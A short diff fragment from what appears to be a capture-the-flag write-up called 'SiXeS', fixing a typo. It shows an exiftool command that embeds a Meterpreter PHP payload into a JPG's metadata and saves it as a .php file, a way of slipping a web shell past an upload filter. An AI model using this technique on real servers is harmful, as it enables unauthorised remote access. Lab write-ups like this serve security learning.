0x00nullSec/Writeups/SiXeS/SiXeS.md

 If you're curious what's written there, you can try to base64 decode the string with [Cyberchef](https://gchq.github.io/CyberChef/)

-Nowe we have to enclose this string into another .jpg which we can upload.
+Now we have to enclose this string into another .jpg which we can upload.

 ~~~
 exiftool -DocumentName="`cat meterpreter.php`" smiley.jpg -o smiley2.php